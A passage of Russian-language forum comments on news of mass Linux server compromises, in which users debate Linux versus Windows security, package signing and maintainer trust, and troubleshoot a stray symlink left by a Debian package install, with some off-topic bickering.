Сообщение от Аноним (??) on 21-Фев-13, 15:51 
> Записывайте в какую больше нравится :-)

Тогда в обе, вроде все критерии на месте :)

Ответить | Правка | ^ к родителю #589 | Наверх | Cообщить модератору

294. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Deluxe (??) on 19-Фев-13, 19:06 
> Сдуру можно и х.. сломать, но зачем это делать ? :-) В
> линапс пришли игры, а где игры там и трояны.

Пусть школьники в свои уютные убунточки ставят трояны, всем пофиг. Речь о серверах.

Ответить | Правка | ^ к родителю #459 | Наверх | Cообщить модератору

298. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 19:09 
> Пусть школьники в свои уютные убунточки ставят трояны, всем пофиг. Речь о
> серверах.

Так и сервера на нем ломают Безупречных систем нет в природе.


Ответить | Правка | ^ к родителю #294 | Наверх | Cообщить модератору

304. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Клыкастый (ok) on 19-Фев-13, 19:16 
> Так и сервера на нем ломают Безупречных систем в природе.

кто-то говорил обратное? безопасность это не характеристика дистра. это процесс. если вас задевают чьи-то слова про то, что линукс безопаснее венды, попробуйте разобраться почему. ИМХО потому что в *nix этот процесс не тормозится скрытыми исходниками. если не поняли - вопрос в том, что security by obscurity нравится далеко не всем и для этого есть основания. напротив, быстрая публикация уязвимостей и патчей, большая вариация дистров как комбинации ядер/библиотек/софта/стиля работы разработчиков многими ценится. вплоть до того что всегда можно выбрать ту комбинацию, которую ты считаешь наиболее адекватной задачам. венда такой свободы не даёт, увы.

Ответить | Правка | ^ к родителю #298 | Наверх | Cообщить модератору

306. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 19:21 
Эмм, где то видел что уязвимости быстрее устраняются в винде. Что же касается зоопарка, это скорее минус а не плюс. Одну систему проще сопровождать.
ЗЫ Меня не задевают ровно потому что сам пишу из под слаки :-) Просто  не люблю узколобых фанатиков, а их, к сожалению, в линуксе полно.
Ответить | Правка | ^ к родителю #304 | Наверх | Cообщить модератору

316. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Клыкастый (ok) on 19-Фев-13, 19:36 
> Эмм, где то видел что уязвимости быстрее устраняются в винде.

Это сложно проверить. И поверить в это тем более сложно. При условии что каждый установленный софт тащит в систему свои либы со своими дырками, сам себя пытается обновлять своим собственным велосипедным способом. Напрочь отсутствует проверка сырцов "со стороны". Вот например во freebsd есть security team и система пометки портов как уязвимые/были уязвимыми. в венде сторонний софт - это жуткий дикий зоопарк: начиная со способа установки (откуда скачал, то и поставил) и заканчивая сопровождением: если разработчик забил болт на разработку/обновление - узнать об этом можно получив на борт "аддон" и поработав в ботнете на дядю.

> Что же касается зоопарка, это скорее минус а не плюс. Одну систему проще сопровождать.

никто не заставляет устраивать копию зоопарка в организации. как раз наоборот - в организации можно сделать всё единообразно. а вот для разработчика малвари это дополнительная сложность.


> ЗЫ Меня не задевают ровно потому что сам пишу из под слаки  :-) Просто  не люблю узколобых фанатиков, а их, к сожалению, в линуксе полно.

кто ж их любит-то. но коричневого вещества в трубах тут и так хватает без дополнительного вендотроллинга :)

Ответить | Правка | ^ к родителю #306 | Наверх | Cообщить модератору

327. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 19:45 
> Эмм, где то видел что уязвимости быстрее устраняются в винде.

Это с фиксами раз в месяц то? А хакерье точно этот месяц изволит ждать, пока майкрософтушка свои патчики оттестирует и всей группой выгрузит? :)

> Что же касается зоопарка, это скорее минус а не плюс. Одну систему проще сопровождать.

Спасибо, видел я как виндовые админы майкрософтовский виртуализатор сопровождают. Вот это я понимаю - хардкор и содомия.

Ответить | Правка | ^ к родителю #306 | Наверх | Cообщить модератору

334. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 19:59 
> Это с фиксами раз в месяц то? А хакерье точно этот месяц
> изволит ждать, пока майкрософтушка свои патчики оттестирует и всей группой выгрузит?
> :)

Чего то я не понял, кто то каждый день пересобирает ядро с mainline апдейтами ?

Ответить | Правка | ^ к родителю #327 | Наверх | Cообщить модератору

339. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 20:11 
Нет. Но апдейт прилетает сразу по готовности фикса. А там уже ответственность админов - решить, когда можно обновить софт. И это не только ядро, кстати, многое перезапускается моментально.
Ответить | Правка | ^ к родителю #334 | Наверх | Cообщить модератору

420. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Michael Shigorin email(ok) on 19-Фев-13, 23:16 
> Чего то я не понял, кто то каждый день пересобирает ядро с
> mainline апдейтами ?

http://packages.altlinux.org/ru/Sisyphus/srpms/kernel-image-...

Ответить | Правка | ^ к родителю #334 | Наверх | Cообщить модератору

424. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 20-Фев-13, 00:04 
>> Чего то я не понял, кто то каждый день пересобирает ядро с
>> mainline апдейтами ?
> http://packages.altlinux.org/ru/Sisyphus/srpms/kernel-image-...

Это сизиф


Ответить | Правка | ^ к родителю #420 | Наверх | Cообщить модератору

646. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 16:03 
> Чего то я не понял, кто то каждый день пересобирает ядро с mainline апдейтами ?

Не, такой опции там не дадено. Но вот ежедневные глюки - разруливают, да. Постоянно что-то факапается без каких либо видимых причин. Просто очень глюкавая в целом конструкция. При том никто не знает что и почему глючит. Видел несколько потуг индусни из саппортов собрать с ынтырпрайзов логи и прочая. Но насколько я знаю, толку было ноль. По крайней мере, за несколько лет как-то сильно менее глюкавым оно не стало. Вообще же я не понимаю как можно такую пре-альфа-версию вываливать энтерпрайзным клиентам.

Ответить | Правка | ^ к родителю #334 | Наверх | Cообщить модератору

585. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 23:55 
> Пусть школьники в свои уютные убунточки ставят трояны, всем пофиг. Речь о серверах.

Чего-то не видно в уютных убунточках троянов. ЧЯДНТ?


Ответить | Правка | ^ к родителю #294 | Наверх | Cообщить модератору

396. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 22:05 
> линапс пришли игры, а где игры там и трояны.

Врядли валв будет отгружать тем кто честно заплатил трояны. А если кто качает варез с торентов (много ты линуксоидов таких видел?) - так ему и надо форматцэ делать по максимуму. Для включения совести.

Ответить | Правка | ^ к родителю #459 | Наверх | Cообщить модератору

591. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 21-Фев-13, 00:15 
>  А если кто
> качает варез с торентов (много ты линуксоидов таких видел?) - так
> ему и надо форматцэ делать по максимуму. Для включения совести.

Тыц - http://rutracker.org/forum/viewforum.php?f=1381
Цифирки скачиваний вроде как чего то говорят :-)

Ответить | Правка | ^ к родителю #396 | Наверх | Cообщить модератору

647. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 16:11 
> Цифирки скачиваний вроде как чего то говорят :-)

Да, что варезников среди линуксоидов немного. Вообще про это Каганов хорошо так написал.

Ответить | Правка | ^ к родителю #591 | Наверх | Cообщить модератору

651. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 21-Фев-13, 16:25 
> Да, что варезников среди линуксоидов немного. Вообще про это Каганов хорошо так
> написал.

Больше всего там скачивают вещи, которые на локалхосте вообще то не нужны. И это тоже о многом говорит .. :-)

Ответить | Правка | ^ к родителю #647 | Наверх | Cообщить модератору

652. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от б.б. on 21-Фев-13, 16:33 
>> Да, что варезников среди линуксоидов немного. Вообще про это Каганов хорошо так
>> написал.
> Больше всего там скачивают вещи, которые на локалхосте вообще то не нужны.
> И это тоже о многом говорит .. :-)

А потом посчитать, сколько с подобных сайтов скачано дистрибутивов Linux, прикинуть, кто качает с подобных сайтов, посмотреть в словарике слово "корреляция" и сделать вывод.


Наличие red hat в виртуалке ещё не наделяет человека свободным мышлением. :)

Ответить | Правка | ^ к родителю #651 | Наверх | Cообщить модератору

653. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 21-Фев-13, 16:37 
> А потом посчитать, сколько с подобных сайтов скачано дистрибутивов Linux, прикинуть, кто
> качает с подобных сайтов,

Ну, вообще то если на локалхосте эти вещи не нужны, то их качают линуксовые админы, а тут уже соовсем другая корреляция получается :-)


Ответить | Правка | ^ к родителю #652 | Наверх | Cообщить модератору

654. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от б.б. on 21-Фев-13, 16:58 
>> А потом посчитать, сколько с подобных сайтов скачано дистрибутивов Linux, прикинуть, кто
>> качает с подобных сайтов,
> Ну, вообще то если на локалхосте эти вещи не нужны, то их
> качают линуксовые админы, а тут уже соовсем другая корреляция получается :-)

см. выше про хостинг-панели.

в суровой реальности такого не замечено.

Ответить | Правка | ^ к родителю #653 | Наверх | Cообщить модератору

93. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 15:37 
> маинтейнеров - которые ломают зависимости между пакетами

А вы не используйте нестабильные отладочные версии.

Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

15. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –10 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 14:25 
[offtop]
>Среди атакованных система также отмечаются серверы с системой обновления ядра ksplice и серверы с sshd на нестандартном порту.

а вы всё ещё считаете что ваши репозитории в безопасноти ? и вашему линуксу не нужна защита одних программ от других программ ? тогда мы идём к вам[/offtop]

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

16. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +8 +/
Сообщение от б.б. on 19-Фев-13, 14:27 
> [offtop]а вы всё ещё считаете что ваши репозитории в безопасноти ? и
> вашему линуксу не нужна защита одних программ от других программ ?
> тогда мы идём к вам[/offtop]

У каждого пакета, который подписан gpg-ключом, есть КОНКРЕТНЫЙ ОТВЕТСТВЕННЫЙ. И если он что-то просунет, то ему, соответственно, коллектив тоже чего-нибудь просунет. Нельзя ничего просунуть тайно, что не стало бы явным.

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

20. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –7 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 14:32 
>> [offtop]а вы всё ещё считаете что ваши репозитории в безопасноти ? и
>> вашему линуксу не нужна защита одних программ от других программ ?
>> тогда мы идём к вам[/offtop]
> У каждого пакета, который подписан gpg-ключом, есть КОНКРЕТНЫЙ ОТВЕТСТВЕННЫЙ. И если он
> что-то просунет, то ему, соответственно, коллектив тоже чего-нибудь просунет. Нельзя ничего
> просунуть тайно, что не стало бы явным.

"когда вас поимели - поздно предохраняться презервативами и пора пить постинор" - вам уже будет "всё равно", ваши ключи от квартиры уже у хацкеров
и от того что кому-то за это будут накручивать кишки на шею вам станет легче ?

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

21. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +6 +/
Сообщение от б.б. on 19-Фев-13, 14:34 
> "когда вас поимели - поздно предохраняться презервативами и пора пить пастинор" - вам уже будет "всё равно", ваши ключи от квартиры уже у хацкеров

и от того что кому-то за это будут накручивать кишки на шею вам станет легче ?

У маинтайнера нет мотивации что-то подкладывать мне в репозиторий. Скорее, меня машина собъёт на балконе, чем я подобного нелепого способа самоубийства дождусь от маинтайнера.

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

31. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 14:51 
>> "когда вас поимели - поздно предохраняться презервативами и пора пить постинор" - вам уже будет "всё равно", ваши ключи от квартиры уже у хацкеров
> и от того что кому-то за это будут накручивать кишки на шею
> вам станет легче ?
> У маинтайнера нет мотивации что-то подкладывать мне в репозиторий. Скорее, меня машина
> собъёт на балконе, чем я подобного нелепого способа самоубийства дождусь от
> маинтайнера.

комп мантейнера / сервер репов подвержены взлому
взломали сервер, выдали ключик, сделали новую версию пакета, подписали новым ключиком, чего вам ещё не хватает для счастья ?

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

35. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +8 +/
Сообщение от б.б. on 19-Фев-13, 14:56 
> комп мантейнера / сервер репов подвержены взлому
> взломали сервер, выдали ключик, сделали новую версию пакета, подписали новым ключиком,
> чего вам ещё не хватает для счастья ?

Проще бомбу в урну подложить.

Вероятность, разумеется, есть, но она настолько мала, что не доверять маинтайнером - это как уехать жить в Антаркдиду подальше от бомб... и получить по кумполу метеоритом каким-нибудь.

Если кто-то не понимает разницы между принципами открытости и принципом чёрного ящика, то я объяснять не собираюсь.

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

42. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –4 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 15:00 
> Если кто-то не понимает разницы между принципами открытости и принципом чёрного ящика,
> то я объяснять не собираюсь.

а причём здесь это ?

Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

148. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 16:27 
> а причём здесь это ?

При том что те же дебианщики например дотошно мониторят все патчи между версиями пакетов. И желающие проверять - велкам сами качнуть сорец и изучать. А вот когда какие-то мутные блобмейкеры предлагают им верить на слово - вот еще не хватало.

Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

164. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 16:44 
> При том что те же дебианщики например дотошно мониторят все патчи между
> версиями пакетов. И желающие проверять - велкам сами качнуть сорец и
> изучать. А вот когда какие-то мутные блобмейкеры предлагают им верить на
> слово - вот еще не хватало.

вот вам дебиан http://www.opennet.dev/openforum/vsluhforumID3/88727.html#85

Ответить | Правка | ^ к родителю #148 | Наверх | Cообщить модератору

167. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 16:53 
>> При том что те же дебианщики например дотошно мониторят все патчи между
>> версиями пакетов. И желающие проверять - велкам сами качнуть сорец и
>> изучать. А вот когда какие-то мутные блобмейкеры предлагают им верить на
>> слово - вот еще не хватало.
> вот вам дебиан http://www.opennet.dev/openforum/vsluhforumID3/88727.html#85

Ничего подобного в пакете libnss3 нет. Он вообще не создаёт никакие симлинки, постинсталл там выглядит вот так:

#!/bin/sh
set -e
if [ "$1" = "configure" ]; then
        ldconfig
fi

и в пакете нет никаких симлинков.

Ответить | Правка | ^ к родителю #164 | Наверх | Cообщить модератору

201. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от linux must _RIP_ on 19-Фев-13, 17:26 
>[оверквотинг удален]
>>> слово - вот еще не хватало.
>> вот вам дебиан http://www.opennet.dev/openforum/vsluhforumID3/88727.html#85
> Ничего подобного в пакете libnss3 нет. Он вообще не создаёт никакие симлинки,
> постинсталл там выглядит вот так:
> #!/bin/sh
> set -e
> if [ "$1" = "configure" ]; then
>         ldconfig
> fi
> и в пакете нет никаких симлинков.

зато симлинки создает ldconfig.

Ответить | Правка | ^ к родителю #167 | Наверх | Cообщить модератору

586. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 23:58 
> зато симлинки создает ldconfig.

Ну спасибо, Капитан. А какой в этом криминал то? Я конечно вижу как два клоуна старательно пытаются "дело шить", но лыжи у клоунов что-то не едут. Т.к. дело разваливается, клоуны даже не могут объяснить в чем, собственно, криминал.

Ответить | Правка | ^ к родителю #201 | Наверх | Cообщить модератору

256. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от JL2001 (ok) on 19-Фев-13, 18:09 
>[оверквотинг удален]
>>> слово - вот еще не хватало.
>> вот вам дебиан http://www.opennet.dev/openforum/vsluhforumID3/88727.html#85
> Ничего подобного в пакете libnss3 нет. Он вообще не создаёт никакие симлинки,
> постинсталл там выглядит вот так:
> #!/bin/sh
> set -e
> if [ "$1" = "configure" ]; then
>         ldconfig
> fi
> и в пакете нет никаких симлинков.

а ещё есть cat ..../ca-certificates_20120623_all.deb/usr/sbin/update-ca-certificates |grep ln
    ln -sf "$CERT" "$PEM"
который вероятно может создавать ошибочные линки http://www.mail-archive.com/debian-bugs-dist@lists.debi...
вы поручитесь что он не создаёт ? я вот пока не разобрался

Ответить | Правка | ^ к родителю #167 | Наверх | Cообщить модератору

67. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +4 +/
Сообщение от mitya (ok) on 19-Фев-13, 15:16 
> комп мантейнера / сервер репов подвержены взлому
> взломали сервер, выдали ключик, сделали новую версию пакета, подписали новым ключиком,
> чего вам ещё не хватает для счастья ?

Ну если мантейнер не способен увидеть, что вчера у него был один ключик, а сегодня  — сюрприз — он почему-то изменился, то зачем такой мантейнер нужен.

Такое ощущение, что вы мантейнеров за домохозяек держите. И программистов среди них нет, и взломать их очень просто, и вирусов накидать, и ключи подменить, и кредитку обчистить.

А мужики-то и не знают!

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

112. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 15:57 
> взломали сервер, выдали ключик,

И как этот ключик у меня в списке доверяемых окажется, интересно? А нормальные майнтайнеры не хранят на серверах с пакетами ключ которым они их подписывают, приколитесь?

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

27. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +6 +/
Сообщение от mitya (ok) on 19-Фев-13, 14:41 
> "когда вас поимели - поздно предохраняться презервативами и пора пить пастинор" -

Постинор.

Прежде чем постить пафосные и банальные фразы, лучше проверьте правописание неизвестных вам слов.
Говорят, помогает.

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

53. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от Michael Shigorin email(ok) on 19-Фев-13, 15:09 
> Прежде чем постить пафосные и банальные фразы, лучше проверьте правописание
> неизвестных вам слов. Говорят, помогает.

А ещё хорошо бы проверить действие (желательно на себе).  Потому как если послушать курс фармакологии, то рекомендации дур с лекций по секспросвету начинают выглядеть совсем иначе.

(для особо тугих извилинами вроде JL2001: употреблять и тем более советовать бездумно гормональные средства -- смерти подобно)

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

61. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от mitya (ok) on 19-Фев-13, 15:13 
> А ещё хорошо бы проверить действие (желательно на себе).

Постинор на женский организм препогано действует.
А если JL2001 мальчик, то я боюсь представить, что с ним от постинора будет.

Впрочем, судя по логике и изложению, он его уже попробовал и регулярно принимает.

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

69. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 15:18 
>> А ещё хорошо бы проверить действие (желательно на себе).
> Постинор на женский организм препогано действует.
> А если JL2001 мальчик, то я боюсь представить, что с ним от
> постинора будет.
> Впрочем, судя по логике и изложению, он его уже попробовал и регулярно
> принимает.

вы предполагаете что аборт на женский (и мужской...) организм действует лучше ? (но это обсуждение уже совсем офтоп....)

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

73. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +10 +/
Сообщение от mitya (ok) on 19-Фев-13, 15:21 
> вы предполагаете что аборт на женский (и мужской...) организм действует лучше ?

Так и подмывает ответить — «Вижу, что нет».

Извините.

Ответить | Правка | ^ к родителю #69 | Наверх | Cообщить модератору

113. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +5 +/
Сообщение от Аноним (??) on 19-Фев-13, 15:58 
> А ещё хорошо бы проверить действие (желательно на себе).

А еще лучше - просто рекурсивно слить оффтопичный тред в треш вместо того чтобы поддерживать его.

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

727. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от A_n_D (ok) on 25-Фев-13, 08:12 
>> Прежде чем постить пафосные и банальные фразы, лучше проверьте правописание
>> неизвестных вам слов. Говорят, помогает.
> А ещё хорошо бы проверить действие (желательно на себе).  Потому как
> если послушать курс фармакологии, то рекомендации дур с лекций по секспросвету
> начинают выглядеть совсем иначе.
> (для особо тугих извилинами вроде JL2001: употреблять и тем более советовать бездумно
> гормональные средства -- смерти подобно)

Обрекать нежеланного ребёнка на жизнь гуманнее?

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

22. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 14:34 
> У каждого пакета, который подписан gpg-ключом, есть КОНКРЕТНЫЙ ОТВЕТСТВЕННЫЙ.

Привет арчеводам. У вас там перед недавним подписанием пакетов эти пакеты все перепроверили?

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

23. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от б.б. on 19-Фев-13, 14:36 
Я лично проверил два.
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

68. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от mitya (ok) on 19-Фев-13, 15:16 
> Я лично проверил два.

Два из скольких?

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

74. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 15:21 
>> Я лично проверил два.
> Два из скольких?

А сколько надо?

Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

76. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 15:22 
Все, очевидно же.
Ответить | Правка | ^ к родителю #74 | Наверх | Cообщить модератору

84. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 15:28 
> Все, очевидно же.

Когда все делают всё, это называется "проприетарная модель развития". Которая эффективна только в одном случае - если у вас есть лишний миллион безмозглых оправдывающих каждый ваш шаг и рвущих за вас глотку рабов.

Во всех остальных удобнее модель, когда каждый делает своё, и они свободно обмениваются результатами.

Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

86. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 15:30 
>> Все, очевидно же.
> Когда все делают всё, это называется "проприетарная модель развития". Которая эффективна
> только в одном случае - если у вас есть лишний миллион
> безмозглых оправдывающих каждый ваш шаг и рвущих за вас глотку рабов.
> Во всех остальных удобнее модель, когда каждый делает своё, и они свободно
> обмениваются результатами.

Мантры, мантры. Снимайте лапшу с ушей.

Но я не имел ввиду, что каждый должен проверять все пакеты, я имел ввиду, что все пакеты должны быть проверены.

Ответить | Правка | ^ к родителю #84 | Наверх | Cообщить модератору

92. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 15:36 
>>> Все, очевидно же.
>> Когда все делают всё, это называется "проприетарная модель развития". Которая эффективна
>> только в одном случае - если у вас есть лишний миллион
>> безмозглых оправдывающих каждый ваш шаг и рвущих за вас глотку рабов.
>> Во всех остальных удобнее модель, когда каждый делает своё, и они свободно
>> обмениваются результатами.
> Мантры, мантры. Снимайте лапшу с ушей.

То, что воины-клоуны постоянно и ежедневно требуют от ВСЕХ делать ВСЁ, преследует ровно одну цель - уравнять по возможностям развития свободное и проприетарное. Ибо тогда проприетарное будет всегда выигрывать, потому что все будут играть по её правилам.

А вот альтернативы свободному, даже альтернативы такому целостному продукту, как Debian, проприетарное не может в принципе. Поэтому, вместо конкуренции, предпочитает принцип "повторение - мать повторения". Или перекладывания с больной головы на здоровую.

Учение Ленина (см. статью "как организовать соцсоревнование") и Эрика Реймонда (см. "волшебный котёл") верно, и поэтому всесильно. А бесплатные рабы заучены гафкать, и поэтому будут гафкать вне зависимости от логических доводов - от логических доводов у них есть хороший блок, называется безмозглость.


> Но я не имел ввиду, что каждый должен проверять все пакеты, я имел ввиду, что все пакеты должны быть проверены.

В debian social contract есть хороший пункт на этот счёт, который всё объясняет.

Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

178. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 17:06 
>[оверквотинг удален]
>>> Во всех остальных удобнее модель, когда каждый делает своё, и они свободно
>>> обмениваются результатами.
>> Мантры, мантры. Снимайте лапшу с ушей.
> То, что воины-клоуны постоянно и ежедневно требуют от ВСЕХ делать ВСЁ, преследует
> ровно одну цель - уравнять по возможностям развития свободное и проприетарное.
> Ибо тогда проприетарное будет всегда выигрывать, потому что все будут играть
> по её правилам.
> А вот альтернативы свободному, даже альтернативы такому целостному продукту, как Debian,
> проприетарное не может в принципе. Поэтому, вместо конкуренции, предпочитает принцип "повторение
> - мать повторения". Или перекладывания с больной головы на здоровую.

буратина, ты демагог. Знаешь, почему? Или подсказать? И еще трепло.

Ответить | Правка | ^ к родителю #92 | Наверх | Cообщить модератору

182. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +4 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:10 
> буратина, ты демагог. Знаешь, почему? Или подсказать? И еще трепло.

А что ещё может сказать описанный персонаж. "Ты кругом прав, а мы просто марионетки без своего мнения". Ну, если бы описанный персонаж мог бы так сказать, он не был бы описанным персонажем, по определению.

А факты - вещь реальная. Их можно потрогать, скачать, установить. И можно либо уметь пользоваться всеми преимуществами, которые они предоставляют, или не уметь и не пользоваться, либо быть законченным быдлом и не умея, мешать другим. Это всё, на что эти воины-импотенты способны - ломать не строить.


Ответить | Правка | ^ к родителю #178 | Наверх | Cообщить модератору

18. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 14:29 
Защита одних программ от других хороша в теории, а на практике приносит столько неудобств, что в большинстве случаев много выгоднее терпеть весьма малый риск взлома.
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

34. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 14:54 
> Защита одних программ от других хороша в теории, а на практике приносит
> столько неудобств, что в большинстве случаев много выгоднее терпеть весьма малый
> риск взлома.

ну вот у меня в корне есть такая прелесть
lrwxrwxrwx 1 root root 36 дек.   5 03:54 /libnss3.so -> /usr/lib/x86_64-linux-gnu/libnss3.so
кто виноват и что делать ? почему какой-то левый пакет имеет права писать в рут ? пусть даже только в момент установки (пц, установочные скрипты ИЗ левого ПАКЕТА запускаются с правами рута - это додуматься ж надо до такого....)

Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

52. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Xasd (ok) on 19-Фев-13, 15:07 
> ну вот у меня в корне есть такая прелесть
> lrwxrwxrwx 1 root root 36 дек.   5 03:54 /libnss3.so ->
> /usr/lib/x86_64-linux-gnu/libnss3.so
> кто виноват и что делать ?

выясни через:

        yum provides /libnss3.so


если эта команда не даст результатов -- значит [с вероятностью 99.999%] ты сам создал эту символьную ссылку [...и надеюсь теперь тебе стыдно :)]

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

85. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от JL2001 (ok) on 19-Фев-13, 15:29 
>> ну вот у меня в корне есть такая прелесть
>> lrwxrwxrwx 1 root root 36 дек.   5 03:54 /libnss3.so ->
>> /usr/lib/x86_64-linux-gnu/libnss3.so
>> кто виноват и что делать ?
> выясни через:
>         yum provides /libnss3.so
> если эта команда не даст результатов -- значит [с вероятностью 99.999%] ты
> сам создал эту символьную ссылку [...и надеюсь теперь тебе стыдно :)]

ознакомьтесь http://www.mail-archive.com/debian-bugs-dist@lists.debi...
у меня похоже аналогичный случай

зы: и надеюсь вам стыдно за необоснованные предположения что мне стыдно за то чего я не делал :)
lrwxrwxrwx 1 root root 36 2012-12-05 03:54:21.882307870 +0400 /libnss3.so -> /usr/lib/x86_64-linux-gnu/libnss3.so
zcat /var/log/dpkg.log.2.gz |grep "ca-certificates:all"
2012-12-05 03:54:01 configure ca-certificates:all 20120623 <нет>
2012-12-05 03:54:01 status unpacked ca-certificates:all 20120623
2012-12-05 03:54:01 status half-configured ca-certificates:all 20120623
2012-12-05 03:54:24 status installed ca-certificates:all 20120623

Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

58. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 15:11 
Кто виноват? Виноваты вы. Что делать? Почитать о том, какие права стоят на симлинках и что они значат.
Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

